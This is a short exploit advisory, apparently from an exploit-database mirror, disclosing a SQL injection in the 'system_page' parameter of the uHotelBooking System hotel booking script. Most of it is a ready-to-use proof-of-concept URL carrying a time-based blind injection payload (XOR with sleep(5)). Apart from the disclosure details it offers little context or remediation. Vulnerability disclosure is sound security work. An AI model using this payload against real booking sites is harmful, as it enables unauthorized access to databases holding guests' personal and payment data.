# Exploit Title: uHotelBooking System - 'system_page' SQL Injection # Date: 21.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.hotel-booking-script.com # Demo Site: https://www.hotel-booking-script.com/demo/ # Version: Lastest # Tested on: Kali Linux # CVE: N/A # Description: uHotelBooking is a powerful hotel management and online booking/reservation site script. ----- PoC: SQLi ----- Request: http://localhost/[PATH]/index.php Vulnerable Parameter: system_page (GET) Attack Pattern: http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
